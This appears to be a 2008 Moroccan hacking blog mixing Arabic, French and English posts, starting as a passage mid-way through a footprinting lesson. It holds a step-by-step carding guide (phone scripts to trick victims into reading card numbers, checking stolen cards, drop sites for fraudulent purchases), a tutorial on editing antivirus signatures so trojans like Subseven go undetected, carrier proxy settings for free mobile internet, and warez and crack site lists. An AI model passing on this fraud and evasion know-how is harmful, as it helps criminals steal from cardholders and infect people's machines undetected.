أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل

4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف

5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه


6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)


7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب

8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها

==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها

ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا

الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman

better than ever

un site pour les hackeurs professionnelles pour leurs rechers
http://www.google.com/intl/xx-hacker

NEWS SUR MAROC TLECOME GPRS CONNECTION

EXCLUSIVE

projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles

hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :

point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :

A1 192.168.171.131 ((((ip racine )))


A2 192.168.173.36

A3 192.168.240.2

A4 192.168.241.20

A5 10.16.35.50

point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :


B1 192.168.171.131 ((((ip racine )))

B2 192.168.173.36

B3 192.168.240.2

si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman

الأربعاء، 11 يونيو 2008

carding

الجزء الاول:

هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده

أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...

ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض

---------------------
هذا هو كيفيه تصنيفهم
---------------------

\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1

\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\

American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!

الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)

ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!

كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر



النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك

---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)

TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---

المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر‍‍‍‍
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00‍‍‍‍‍!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express

/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard

/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa

/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo

/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا



لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman

the new is never be dead with the king

exclusive
voila des sites nv et teste par notre équipe plus que 25 fois

site pour navigation anonyme en https : ça marche sur pc et gsm



electroman hacking surfing free

https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.

https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a

https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse

الثلاثاء، 10 يونيو 2008

Imedia and maroc telecome your GPRS confeguration is here is here...//// maroc telecome? meditel? envoiyer votre configuration gprs

vous ete client chez meditel ou bien maroc telecome tu vx avoir ta configuration gprs gratuitement voila la solution :
maroc telecome : http://www.mobileiam.ma/param_mobile.asp

meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view

notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :

meditel : 121

maroc telecome :888

mr electroman news merci et bonne journée

الأحد، 8 يونيو 2008

weebo get fast ur connection with firefox / avoir weebo rapide avec firefox

to have a fast weebo with firefox please fellow the instruction :
Clearing Your Cache/Cookies

Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.

For Firefox users:

1. Click on “Tools” at the top of the browser window

2. Select “Clear Private Data” from the drop-down menu

3. Put a check mark next to “Cache” and “Cookies”

4. Click on the “Clear Private Data Now” button

السبت، 7 يونيو 2008

msn 8 avec gprs maroc telecome connection presenter par electroman

c'est vos avez une connection iam pirater sur votre pc (voire notre article sur internet gratuit) voila un site ki peux eter utile pour toi de chatter envoyer vos photos et mem avoir une discution rapide
https://meebo.com
mr electroman 078324021

الجمعة، 6 يونيو 2008

c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts

presenter par electroman
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun

Comment intercepter la signature d'un virus et la changer

Comment intercepter la signature d'un virus et la changer...
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..

site web pour tt vos telechargement derb ralef cest ici

derb ralef

humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter

catégorie 1 présent par mr electroman

http://www.pegasoft.cz/

http://www.ddlworld.com/

http://www.bg-warez.org

http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ

http://stormzone.org/news.php

http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1

http://www.wolkysoft.us

http://www.soft-best.net

http://www.directwarez.com/ddl.php?page=1


catégorie 2

1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/


pour les crack et serial



http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com

mr electroman

imedia connection gratuit

internet gratuit avec le service imedia comment.?

pour avoir imedia gratuit sur ton mobile enter ces paramters svp

avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8

apn:wap.meditel.ma

id utilisateur MEDIWAP

mot de passe :MEDIWAP

authentification : sécurise

automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view

remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci

IMEDIA et il gratuit .??

pour quoi i media est gratuit avec des utilisateur de service mais il ne marche pas avec des autres membres du service imedia même si l'option du sécurité et active?.?

réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter

merci votre frer amine raghib alias electroman

attention maroc telecome free connection to ur pc

how to get free connection to ur pc via gprs connection ???

humm is easy

what do you need before

cabel: between ur pc and gsm phone

pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it

firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer

sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com

dont froget if the first browser is blocked tray the secound and vers versa

ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank

after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing

driver adress web site

hi !!! and welcome
mr amine from morocco
age ;22
my mission is to help u in ur life
my pics here u found it
http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan

ok let's start my first topic

i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver

http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/

Direct X:
http://www.microsoft.com/windows/directx/default.aspx


Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php

Sound Drivers:

Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/


Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
